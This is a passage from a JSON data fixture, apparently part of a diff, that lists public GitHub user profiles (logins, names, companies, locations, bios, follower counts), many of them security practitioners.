"created_at": "2011-06-22T05:38:01Z", + "updated_at": "2020-06-04T17:06:33Z", + "node_id": "MDQ6VXNlcjg2NjA0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 818, + "fields": { + "nest_created_at": "2024-09-11T22:09:09.802Z", + "nest_updated_at": "2024-09-22T18:30:19.622Z", + "name": "Martin Gallo", + "login": "martingalloar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3941628?v=4", + "company": "@hyprcorp", + "location": "Sur", + "collaborators_count": 0, + "following_count": 86, + "followers_count": 361, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2013-03-22T13:53:25Z", + "updated_at": "2024-09-20T01:14:51Z", + "node_id": "MDQ6VXNlcjM5NDE2Mjg=", + "bio": "InfoSec Leader/Innovation | 👨🏾‍💻PdM @HYPRCorp | 🙆Co-org @TandilSec | 🧐CFP @EkoParty | ✊Knowledge sharing and community building | 🏀#12 | 🗨️Words are mine", + "is_hireable": false, + "twitter_username": "martingalloar" + } +}, +{ + "model": "github.user", + "pk": 819, + "fields": { + "nest_created_at": "2024-09-11T22:09:14.027Z", + "nest_updated_at": "2024-09-22T18:30:17.804Z", + "name": "", + "login": "codeHorse87", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10906772?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2015-02-08T09:46:53Z", + "updated_at": "2024-06-04T13:10:13Z", + "node_id": "MDQ6VXNlcjEwOTA2Nzcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 820, + "fields": { + "nest_created_at": "2024-09-11T22:09:47.962Z", + "nest_updated_at": "2024-09-22T20:26:23.591Z", + "name": "Mark Denihan", + "login": "markdenihan", + "email": "mark.denihan@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/3484318?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 106, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-02-05T18:20:52Z", + "updated_at": "2022-07-15T15:12:39Z", + "node_id": "MDQ6VXNlcjM0ODQzMTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 821, + "fields": { + "nest_created_at": "2024-09-11T22:09:49.261Z", + "nest_updated_at": "2024-09-22T20:26:24.224Z", + "name": "Seán", + "login": "SeanDuggan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2421968?v=4", + "company": "Lexis Nexis", + "location": "Dublin", + "collaborators_count": 0, + "following_count": 65, + "followers_count": 99, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-09-25T17:35:50Z", + "updated_at": "2024-09-19T19:40:42Z", + "node_id": "MDQ6VXNlcjI0MjE5Njg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 822, + "fields": { + "nest_created_at": "2024-09-11T22:10:14.500Z", + "nest_updated_at": "2024-09-22T20:26:25.861Z", + "name": "Aidan Knowles", + "login": "aidanknowles", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6151063?v=4", + "company": "IBM", + "location": "Dublin, Ireland", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-12-10T11:11:25Z", + "updated_at": "2020-01-22T23:17:30Z", + "node_id": "MDQ6VXNlcjYxNTEwNjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 823, + "fields": { + "nest_created_at": "2024-09-11T22:10:18.695Z", + "nest_updated_at": "2024-09-22T18:32:21.927Z", + "name": "Michael Hidalgo", + "login": "michaelhidalgo", + "email": "michaelfallas@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1732035?v=4", + "company": "", + "location": "San José, Costa Rica", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 18, + "public_gists_count": 16, + "public_repositories_count": 136, + "created_at": "2012-05-12T05:22:01Z", + "updated_at": "2024-05-09T08:15:38Z", + "node_id": "MDQ6VXNlcjE3MzIwMzU=", + "bio": "Software Engineer and Application Security researcher based in Costa Rica. \r\n", + "is_hireable": true, + "twitter_username": "michael_hidalgo" + } +}, +{ + "model": "github.user", + "pk": 824, + "fields": { + "nest_created_at": "2024-09-11T22:10:37.276Z", + "nest_updated_at": "2024-09-11T22:10:37.276Z", + "name": "", + "login": "daniel5001", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12633473?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-05-27T21:41:43Z", + "updated_at": "2024-04-26T14:19:56Z", + "node_id": "MDQ6VXNlcjEyNjMzNDcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 825, + "fields": { + "nest_created_at": "2024-09-11T22:10:38.956Z", + "nest_updated_at": "2024-09-11T22:10:38.956Z", + "name": "", + "login": "githubname1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11516698?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-03-17T07:51:30Z", + "updated_at": "2020-04-19T20:02:50Z", + "node_id": "MDQ6VXNlcjExNTE2Njk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 826, + "fields": { + "nest_created_at": "2024-09-11T22:10:42.742Z", + "nest_updated_at": "2024-09-11T22:10:42.742Z", + "name": "Blessen Thomas", + "login": "pentagramz", + "email": "blessenthomas75@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7072014?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 62, + "followers_count": 16, + "public_gists_count": 4, + "public_repositories_count": 237, + "created_at": "2014-03-26T16:19:47Z", + "updated_at": "2024-05-29T22:24:51Z", + "node_id": "MDQ6VXNlcjcwNzIwMTQ=", + "bio": "Security Researcher | Trainer | Speaker ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 827, + "fields": { + "nest_created_at": "2024-09-11T22:10:44.422Z", + "nest_updated_at": "2024-09-11T22:10:57.115Z", + "name": "", + "login": "nytshadow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40641433?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-06-27T18:01:53Z", + "updated_at": "2020-11-19T23:01:24Z", + "node_id": "MDQ6VXNlcjQwNjQxNDMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 828, + "fields": { + "nest_created_at": "2024-09-11T22:10:59.180Z", + "nest_updated_at": "2024-09-22T20:26:30.028Z", + "name": "gbena", + "login": "gbena", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16888782?v=4", + "company": "Stark Industries", + "location": "Earth", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-01-25T23:22:37Z", + "updated_at": "2021-06-20T04:01:47Z", + "node_id": "MDQ6VXNlcjE2ODg4Nzgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 829, + "fields": { + "nest_created_at": "2024-09-11T22:10:59.587Z", + "nest_updated_at": "2024-09-22T20:26:31.289Z", + "name": "", + "login": "andrrac", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40352451?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-06-18T07:52:20Z", + "updated_at": "2018-10-07T05:15:44Z", + "node_id": "MDQ6VXNlcjQwMzUyNDUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 830, + "fields": { + "nest_created_at": "2024-09-11T22:11:21.387Z", + "nest_updated_at": "2024-09-11T22:11:21.387Z", + "name": "Aditya Mistri", + "login": "aditya-mistri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123372823?v=4", + "company": "", + "location": "delhi", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 41, + "created_at": "2023-01-23T11:30:05Z", + "updated_at": "2024-08-22T13:08:58Z", + "node_id": "U_kgDOB1qFFw", + "bio": "B.Tech undergraduate. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 831, + "fields": { + "nest_created_at": "2024-09-11T22:11:26.905Z", + "nest_updated_at": "2024-09-22T20:26:25.494Z", + "name": "Rob Conan", + "login": "Rob-Conan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5645045?v=4", + "company": "", + "location": "Dublin", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 4, + "public_repositories_count": 17, + "created_at": "2013-10-09T08:04:38Z", + "updated_at": "2024-02-20T15:16:48Z", + "node_id": "MDQ6VXNlcjU2NDUwNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 832, + "fields": { + "nest_created_at": "2024-09-11T22:11:34Z", + "nest_updated_at": "2024-09-22T19:46:24.105Z", + "name": "Bram", + "login": "brampat", + "email": "bram.msn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3624563?v=4", + "company": "Ordina", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2013-02-18T09:02:21Z", + "updated_at": "2024-09-17T12:43:44Z", + "node_id": "MDQ6VXNlcjM2MjQ1NjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 833, + "fields": { + "nest_created_at": "2024-09-11T22:11:36.043Z", + "nest_updated_at": "2024-09-22T20:26:30.663Z", + "name": "Ryan James", + "login": "ryanjames85", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16687982?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-01-13T15:41:07Z", + "updated_at": "2024-07-16T22:28:14Z", + "node_id": "MDQ6VXNlcjE2Njg3OTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 834, + "fields": { + "nest_created_at": "2024-09-11T22:11:37.319Z", + "nest_updated_at": "2024-09-22T20:26:29.077Z", + "name": "", + "login": "Samuel-BF", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36996277?v=4", + "company": "", + "location": "Paris", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2018-03-02T16:19:20Z", + "updated_at": "2024-09-04T20:08:22Z", + "node_id": "MDQ6VXNlcjM2OTk2Mjc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 835, + "fields": { + "nest_created_at": "2024-09-11T22:11:41.446Z", + "nest_updated_at": "2024-09-11T22:11:41.446Z", + "name": "Paolo del Mundo", + "login": "paolodm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/247525?v=4", + "company": "", + "location": "Washington DC", + "collaborators_count": 0, + "following_count": 44, + "followers_count": 21, + "public_gists_count": 3, + "public_repositories_count": 98, + "created_at": "2010-04-19T18:14:43Z", + "updated_at": "2024-07-10T20:15:40Z", + "node_id": "MDQ6VXNlcjI0NzUyNQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 836, + "fields": { + "nest_created_at": "2024-09-11T22:11:43.153Z", + "nest_updated_at": "2024-09-11T22:11:43.153Z", + "name": "", + "login": "Elmeche", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49430274?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-04-09T07:03:36Z", + "updated_at": "2024-04-24T04:32:20Z", + "node_id": "MDQ6VXNlcjQ5NDMwMjc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 837, + "fields": { + "nest_created_at": "2024-09-11T22:11:46.580Z", + "nest_updated_at": "2024-09-22T20:26:28.081Z", + "name": "Jonathan Jogenfors", + "login": "etnoy", + "email": "jonathan@jogenfors.se", + "avatar_url": "https://avatars.githubusercontent.com/u/135728?v=4", + "company": "OpenText Cybersecurity", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2009-10-06T11:17:34Z", + "updated_at": "2024-09-17T11:20:07Z", + "node_id": "MDQ6VXNlcjEzNTcyOA==", + "bio": "Application Security Professional @ Fortify. Immich contributor.", + "is_hireable": false, + "twitter_username": "jogenfors" + } +}, +{ + "model": "github.user", + "pk": 838, + "fields": { + "nest_created_at": "2024-09-11T22:11:57.589Z", + "nest_updated_at": "2024-09-22T20:23:56.960Z", + "name": "François Capon", + "login": "FrancoisCapon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46624375?v=4", + "company": "", + "location": "France, Vaucluse", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 40, + "public_gists_count": 8, + "public_repositories_count": 30, + "created_at": "2019-01-12T11:54:36Z", + "updated_at": "2024-06-19T21:51:04Z", + "node_id": "MDQ6VXNlcjQ2NjI0Mzc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 839, + "fields": { + "nest_created_at": "2024-09-11T22:11:59.684Z", + "nest_updated_at": "2024-09-11T22:11:59.684Z", + "name": "", + "login": "LukeParsnips", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42177814?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-08-07T13:09:22Z", + "updated_at": "2022-12-10T19:26:37Z", + "node_id": "MDQ6VXNlcjQyMTc3ODE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 840, + "fields": { + "nest_created_at": "2024-09-11T22:12:06.871Z", + "nest_updated_at": "2024-09-11T22:12:06.871Z", + "name": "", + "login": "40R40L", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45973969?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-12-18T15:39:44Z", + "updated_at": "2021-01-01T21:06:03Z", + "node_id": "MDQ6VXNlcjQ1OTczOTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 841, + "fields": { + "nest_created_at": "2024-09-11T22:12:14.405Z", + "nest_updated_at": "2024-09-11T22:12:14.405Z", + "name": "", + "login": "anquanbiji", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76862089?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2021-01-02T06:35:13Z", + "updated_at": "2022-05-15T09:36:34Z", + "node_id": "MDQ6VXNlcjc2ODYyMDg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 842, + "fields": { + "nest_created_at": "2024-09-11T22:12:19.565Z", + "nest_updated_at": "2024-09-11T22:12:35.375Z", + "name": "Jeremiah", + "login": "jmarquez90", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23003959?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-10-22T20:21:39Z", + "updated_at": "2024-03-29T15:14:31Z", + "node_id": "MDQ6VXNlcjIzMDAzOTU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 843, + "fields": { + "nest_created_at": "2024-09-11T22:12:36.597Z", + "nest_updated_at": "2024-09-22T20:26:26.490Z", + "name": "rudosch", + "login": "rudosch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52255659?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-06-26T17:54:46Z", + "updated_at": "2023-03-07T14:51:27Z", + "node_id": "MDQ6VXNlcjUyMjU1NjU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 844, + "fields": { + "nest_created_at": "2024-09-11T22:12:40.326Z", + "nest_updated_at": "2024-09-11T22:12:40.326Z", + "name": "Malte Skoruppa", + "login": "malte-skoruppa-sonarsource", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64034108?v=4", + "company": "SonarSource", + "location": "Bochum", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-04-20T17:29:10Z", + "updated_at": "2024-08-21T12:26:33Z", + "node_id": "MDQ6VXNlcjY0MDM0MTA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 845, + "fields": { + "nest_created_at": "2024-09-11T22:12:41.551Z", + "nest_updated_at": "2024-09-11T22:12:41.551Z", + "name": "Max Moser", + "login": "mmhdbw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77432537?v=4", + "company": "HDBW - Hochschule der Bayerischen Wirtschaft", + "location": "München", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2021-01-14T07:41:12Z", + "updated_at": "2024-06-26T10:10:16Z", + "node_id": "MDQ6VXNlcjc3NDMyNTM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 846, + "fields": { + "nest_created_at": "2024-09-11T22:12:42.764Z", + "nest_updated_at": "2024-09-11T22:12:42.764Z", + "name": "", + "login": "Mossaki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149950111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-05T14:14:59Z", + "updated_at": "2023-11-05T14:57:23Z", + "node_id": "U_kgDOCPAOnw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 847, + "fields": { + "nest_created_at": "2024-09-11T22:12:43.610Z", + "nest_updated_at": "2024-09-11T22:12:43.610Z", + "name": "", + "login": "aaucestova", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/125047946?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-10T15:10:31Z", + "updated_at": "2024-01-10T23:13:14Z", + "node_id": "U_kgDOB3QUig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 848, + "fields": { + "nest_created_at": "2024-09-11T22:12:44.842Z", + "nest_updated_at": "2024-09-11T22:12:44.842Z", + "name": "", + "login": "xuantien177", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42117477?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-08-05T15:20:20Z", + "updated_at": "2024-08-16T03:59:26Z", + "node_id": "MDQ6VXNlcjQyMTE3NDc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 849, + "fields": { + "nest_created_at": "2024-09-11T22:12:45.678Z", + "nest_updated_at": "2024-09-11T22:12:45.678Z", + "name": "", + "login": "upamapsb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87877143?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2021-07-23T19:31:24Z", + "updated_at": "2024-09-06T12:25:15Z", + "node_id": "MDQ6VXNlcjg3ODc3MTQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 850, + "fields": { + "nest_created_at": "2024-09-11T22:12:55.459Z", + "nest_updated_at": "2024-09-22T19:45:21.188Z", + "name": "Chetan Karande", + "login": "ckarande", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/264859?v=4", + "company": "", + "location": "NY", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 144, + "public_gists_count": 1, + "public_repositories_count": 55, + "created_at": "2010-05-04T19:50:09Z", + "updated_at": "2024-04-10T11:07:47Z", + "node_id": "MDQ6VXNlcjI2NDg1OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 851, + "fields": { + "nest_created_at": "2024-09-11T22:12:59.274Z", + "nest_updated_at": "2024-09-22T18:32:31.912Z", + "name": "minhaz", + "login": "mebjas", + "email": "minhazav@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3007365?v=4", + "company": "Google", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 504, + "public_gists_count": 137, + "public_repositories_count": 158, + "created_at": "2012-12-10T12:05:32Z", + "updated_at": "2024-09-01T11:23:37Z", + "node_id": "MDQ6VXNlcjMwMDczNjU=", + "bio": "Senior Software Engineer @google - Computational photography on lowest hardwares", + "is_hireable": true, + "twitter_username": "minhazav" + } +}, +{ + "model": "github.user", + "pk": 852, + "fields": { + "nest_created_at": "2024-09-11T22:13:00.122Z", + "nest_updated_at": "2024-09-11T22:13:00.122Z", + "name": "Snyk Community", + "login": "snyk-community", + "email": "community@snyk.io", + "avatar_url": "https://avatars.githubusercontent.com/u/22027093?v=4", + "company": "@snyk", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 108, + "created_at": "2016-09-06T11:38:19Z", + "updated_at": "2017-02-13T08:03:56Z", + "node_id": "MDQ6VXNlcjIyMDI3MDkz", + "bio": "Snyk's community, opens pull requests to fix known vulnerabilities in your dependencies. Check out https://snyk.io/ to learn more.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 853, + "fields": { + "nest_created_at": "2024-09-11T22:13:00.554Z", + "nest_updated_at": "2024-09-22T20:23:34.724Z", + "name": "Kim Carter", + "login": "binarymist", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2862029?v=4", + "company": "binarymist", + "location": "Land of the Long White Cloud", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 138, + "public_gists_count": 1, + "public_repositories_count": 73, + "created_at": "2012-11-22T10:20:44Z", + "updated_at": "2024-09-13T22:41:53Z", + "node_id": "MDQ6VXNlcjI4NjIwMjk=", + "bio": "Founder of BinaryMist, Creator of PurpleTeam-Labs, Author of Holistic Infosec for Web Developers, Host se-radio.net, Co-founder ChCon.nz\r\n,\r\n", + "is_hireable": true, + "twitter_username": "binarymist" + } +}, +{ + "model": "github.user", + "pk": 854, + "fields": { + "nest_created_at": "2024-09-11T22:13:06.094Z", + "nest_updated_at": "2024-09-22T18:31:11.745Z", + "name": "Josep Servat", + "login": "servatj", + "email": "jservatlorca@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3521485?v=4", + "company": "Divance", + "location": "Dubai", + "collaborators_count": 0, + "following_count": 236, + "followers_count": 66, + "public_gists_count": 10, + "public_repositories_count": 32, + "created_at": "2013-02-09T21:51:34Z", + "updated_at": "2024-09-15T10:50:34Z", + "node_id": "MDQ6VXNlcjM1MjE0ODU=", + "bio": "I'm an enthusiast developer of many technologies, currently working with node js, react, python and scala and having an eye to blockchain technologies.", + "is_hireable": true, + "twitter_username": "servatj" + } +}, +{ + "model": "github.user", + "pk": 855, + "fields": { + "nest_created_at": "2024-09-11T22:13:12.041Z", + "nest_updated_at": "2024-09-22T18:31:11.107Z", + "name": "xin jin", + "login": "lucas1004jx", + "email": "lucas1004jx@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26882101?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 10, + "public_gists_count": 8, + "public_repositories_count": 23, + "created_at": "2017-04-03T19:46:04Z", + "updated_at": "2024-09-12T13:59:14Z", + "node_id": "MDQ6VXNlcjI2ODgyMTAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 856, + "fields": { + "nest_created_at": "2024-09-11T22:13:17.547Z", + "nest_updated_at": "2024-09-11T22:13:17.548Z", + "name": "Carlos Azaustre", + "login": "carlosazaustre", + "email": "cazaustre@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/650752?v=4", + "company": "@PintaAPIs", + "location": "Madrid, Spain", + "collaborators_count": 0, + "following_count": 250, + "followers_count": 4169, + "public_gists_count": 15, + "public_repositories_count": 283, + "created_at": "2011-03-04T10:48:06Z", + "updated_at": "2024-08-28T10:29:01Z", + "node_id": "MDQ6VXNlcjY1MDc1Mg==", + "bio": "Software Engineer ▪︎ Associate Professor UEM ▪︎ Google Developer Expert (GDE) in Web Technologies ▪︎ Microsoft MVP", + "is_hireable": true, + "twitter_username": "carlosazaustre" + } +}, +{ + "model": "github.user", + "pk": 857, + "fields": { + "nest_created_at": "2024-09-11T22:13:23.043Z", + "nest_updated_at": "2024-09-11T22:13:23.043Z", + "name": "Milecia McG", + "login": "flippedcoder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47196133?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 92, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2019-01-30T22:31:52Z", + "updated_at": "2024-08-30T18:09:40Z", + "node_id": "MDQ6VXNlcjQ3MTk2MTMz", + "bio": "", + "is_hireable": false, + "twitter_username": "FlippedCoding" + } +}, +{ + "model": "github.user", + "pk": 858, + "fields": { + "nest_created_at": "2024-09-11T22:13:39.459Z", + "nest_updated_at": "2024-09-22T18:31:11.421Z", + "name": "Theba Gomez", + "login": "KoolTheba", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26543236?v=4", + "company": "@OSWeekends @Fictizia @node-girls ", + "location": "Madrid", + "collaborators_count": 0, + "following_count": 92, + "followers_count": 157, + "public_gists_count": 4, + "public_repositories_count": 83, + "created_at": "2017-03-20T11:49:28Z", + "updated_at": "2024-07-09T15:14:37Z", + "node_id": "MDQ6VXNlcjI2NTQzMjM2", + "bio": "Fullstack SWE 🌳 | \r\nGuilds Ambassador and Org. @OSWeekends | @nodegirls Madrid Founder & Lead | Open Source contributor & advocate", + "is_hireable": false, + "twitter_username": "KoolTheba" + } +}, +{ + "model": "github.user", + "pk": 859, + "fields": { + "nest_created_at": "2024-09-11T22:13:41.113Z", + "nest_updated_at": "2024-09-11T22:13:41.970Z", + "name": "Nicolas Harraudeau", + "login": "nharraud", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5708796?v=4", + "company": "", + "location": "Geneva", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 87, + "created_at": "2013-10-17T11:05:26Z", + "updated_at": "2024-08-16T06:58:22Z", + "node_id": "MDQ6VXNlcjU3MDg3OTY=", + "bio": "Creating a new open source Team Building platform for developers.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 860, + "fields": { + "nest_created_at": "2024-09-11T22:13:42.821Z", + "nest_updated_at": "2024-09-11T22:13:42.821Z", + "name": "", + "login": "mo718", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64512529?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-04-29T02:53:51Z", + "updated_at": "2024-02-28T02:58:51Z", + "node_id": "MDQ6VXNlcjY0NTEyNTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 861, + "fields": { + "nest_created_at": "2024-09-11T22:14:09.542Z", + "nest_updated_at": "2024-09-22T19:47:59.633Z", + "name": "Sebastien Deleersnyder", + "login": "SebaDele", + "email": "seba@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/5277413?v=4", + "company": "Toreon", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 89, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2013-08-21T10:17:52Z", + "updated_at": "2024-09-04T07:34:52Z", + "node_id": "MDQ6VXNlcjUyNzc0MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 862, + "fields": { + "nest_created_at": "2024-09-11T22:14:14.881Z", + "nest_updated_at": "2024-09-22T18:31:58.830Z", + "name": 